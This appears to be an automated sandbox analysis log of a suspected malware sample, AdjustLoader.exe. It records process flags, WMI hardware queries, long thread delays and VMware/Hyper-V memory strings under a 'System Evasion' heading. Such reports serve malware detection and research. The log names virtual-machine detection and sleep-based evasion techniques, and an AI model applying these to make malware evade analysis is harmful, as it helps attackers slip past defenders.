Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Users\user\Desktop\AdjustLoader.exe Memory allocated: 1C8DC000000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\AdjustLoader.exe Memory allocated: 1C8F5AF0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\AdjustLoader.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6801
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2980
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8063
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1288
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7873
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1524
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4329
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1372
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 651
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3950
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 521
Source: C:\Windows\System32\dllhost.exe Window / User API: threadDelayed 429
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Windows\System32\conhost.exe API coverage: 4.7 %
Source: C:\Users\user\Desktop\AdjustLoader.exe TID: 7580 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\cmd.exe TID: 1988 Thread sleep time: -55000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7868 Thread sleep count: 6801 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7872 Thread sleep count: 2980 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7908 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7712 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\cmd.exe TID: 2260 Thread sleep time: -49000s >= -30000s
Source: C:\Windows\System32\cmd.exe TID: 3760 Thread sleep time: -49000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8032 Thread sleep time: -21213755684765971s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3612 Thread sleep count: 4329 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6628 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2540 Thread sleep count: 1372 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 928 Thread sleep count: 44 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 928 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6048 Thread sleep count: 3950 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 908 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7896 Thread sleep count: 521 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8120 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 3192 Thread sleep count: 429 > 30
Source: C:\Windows\System32\dllhost.exe TID: 3192 Thread sleep time: -42900s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 5960 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 5012 Thread sleep count: 63 > 30
Source: C:\Windows\System32\winlogon.exe TID: 5012 Thread sleep time: -63000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 1448 Thread sleep count: 48 > 30
Source: C:\Windows\System32\lsass.exe TID: 1448 Thread sleep time: -48000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2148 Thread sleep count: 57 > 30
Source: C:\Windows\System32\svchost.exe TID: 2148 Thread sleep time: -57000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4624 Thread sleep count: 60 > 30
Source: C:\Windows\System32\svchost.exe TID: 4624 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7344 Thread sleep count: 59 > 30
Source: C:\Windows\System32\svchost.exe TID: 7344 Thread sleep time: -59000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5376 Thread sleep count: 59 > 30
Source: C:\Windows\System32\svchost.exe TID: 5376 Thread sleep time: -59000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\cmd.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Code function: 47_2_0000024D9FF7D834 FindFirstFileExW, 47_2_0000024D9FF7D834
Source: C:\Windows\System32\conhost.exe Code function: 47_2_0000024D9FF7D9B8 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 47_2_0000024D9FF7D9B8
Source: C:\Users\user\Desktop\AdjustLoader.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe Thread delayed: delay time: 922337203685477
Source: Amcache.hve.11.dr Binary or memory string: VMware
Source: Amcache.hve.11.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.11.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: powershell.exe, 00000012.00000002.2020721365.00000138001BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
Source: svchost.exe, 0000003A.00000000.2385311485.000002A66062A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: powershell.exe, 00000027.00000002.2403335664.000002580047E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: QEMumnvhRFLVUNALgXqrZYjJyPMJJGQpbmpQTjgUgZpzcBFtIhVRamrSvdVxBMylOwUHyJSXQvkZJJHXjsaBKYoOVxvPoJttBeLFHXVZoYbEcrjLvYniMWAP% GGfLdnNjrWNHmHzXyuIOdILAZUitiUBZAntHGCYCesLkhMcIMpChCcgYUEMjfuaxuNgZnSqVwgKLWBsnRzGTsuwyguMcQOxKroPtFdvTZHLwsvbslyrGNhfarISSfoeHJZuIMZIOeMUKIZfLtuQsxRWjjOcW=COLCeNsbsGmQCBanusrChzLxMk
Source: Amcache.hve.11.dr Binary or memory string: vmci.sys
Source: powershell.exe, 00000008.00000002.2018154793.0000027B0052E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vdVxBMylOwUHyJSXQvkZJJHXjsaBKYoOVxvPoJttBeLFHXVZoYbEcrjLvYniMWAP%t%dkzXWLECYjiEmNJaOEBUpWWOwLudddnQTVpQSIqeYZcelNfOxyWSkpChoLAlrBzUVrKqyThfoxVpTSDJFFFEgvGDtiChhfNxAhjTcPqErQEMumnvhRFLVUNALgXqrZYjJyPMJJGQpbmpQTjgUgZpzcBFtIhVRamrSvdVxBMylOwUHyJSXQvkZJJHXjsaBKYoOVxvPoJttBeLFHXVZoYbEcrjLvYniMWAP% GGfLdnNjrWNHmHzXyuIOdILAZUitiUBZAntHGCYCesLkhMcIMpChCcgYUEMjfuaxuNgZnSqVwgKLWBsnRzGTsuwyguMcQOxKroPtFdvTZHLwsvbslyrGNhfarISSfoeHJZuIMZIOeMUKIZfLtuQsxRWjjOcW=COLCeNsbsGmQCBanusrChzLxMk
Source: Amcache.hve.11.dr Binary or memory string: VMware20,1
Source: Amcache.hve.11.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.11.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.11.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.11.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.11.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.11.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.11.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.11.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.11.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.11.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: AdjustLoader.exe, 00000000.00000002.1674660423.000001C8DBFA9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\
Source: powershell.exe, 00000012.00000002.2020721365.00000138001BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: Amcache.hve.11.dr Binary or memory string: VMware Virtual USB Mouse
Source: lsass.exe, 00000039.00000000.2382252553.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicvssNT SERVICE
Source: Amcache.hve.11.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.11.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.11.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.11.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.11.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: wscript.exe, 00000019.00000002.2025415526.000002530EA20000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}$
Source: Amcache.hve.11.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: wscript.exe, 00000014.00000002.2007218592.000001E4E9F92000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\h
Source: dwm.exe, 0000003B.00000000.2390348324.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000S
Source: powershell.exe, 00000008.00000002.2018154793.0000027B002D2000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: 